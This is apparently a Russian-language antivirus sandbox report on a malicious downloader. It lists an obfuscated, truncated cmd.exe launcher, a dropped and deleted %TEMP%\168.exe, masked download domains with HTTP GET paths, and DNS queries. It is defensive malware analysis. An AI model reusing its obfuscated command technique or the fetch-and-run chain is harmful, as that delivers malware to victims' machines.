Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /V:ON/C"set 2e=quAuWjtuwCEDnvjDhEPvi6e'z2$m+ GSo:{-a4l)K3}B.g8\yfxdU1bN=VFR/k,pYXr@s(c;&&for %N in (63,32,8,22,66,68,16,22,38,38,29,26,20,20,14,56,12,22,8,35,32,54,14,22,70,6,29,55,22,6,44,4,22...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\168.exe
Удаляет следующие файлы
- %TEMP%\168.exe
Сетевая активность
Подключается к
- 'kl###erigi.com':80
- 'kl###erigi.com':443
- 'kn####gafrica.org':80
- 'ex####mental.co.za':80
- 'ex####mental.co.za':443
- 'la#####quedesign.com':80
TCP
Запросы HTTP GET
- http://kl###erigi.com/so11V
- http://kn####gafrica.org/KKez3Xv
- http://ex####mental.co.za/BAlc
- http://la#####quedesign.com/RYiRD
- http://www.la#####quedesign.com/RYiRD
- http://www.la#####quedesign.com/
Другие
- 'kl###erigi.com':443
- 'ex####mental.co.za':443
UDP
- DNS ASK kl###erigi.com
- DNS ASK kn####gafrica.org
- DNS ASK ex####mental.co.za
- DNS ASK la#####quedesign.com
- DNS ASK pl####sdetossa.com
Другое
Ищет следующие окна
- ClassName: '' WindowName: ''
- ClassName: '' WindowName: '30'
- ClassName: '' WindowName: '0'
- ClassName: '' WindowName: '1154443046'
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:ON/C"set 2e=quAuWjtuwCEDnvjDhEPvi6e'z2$m+ GSo:{-a4l)K3}B.g8\yfxdU1bN=VFR/k,pYXr@s(c;&&for %N in (63,32,8,22,66,68,16,22,38,38,29,26,20,20,14,56,12,22,8,35,32,54,14,22,70,6,29,55,22,6,44,4,22...' (со скрытым окном)
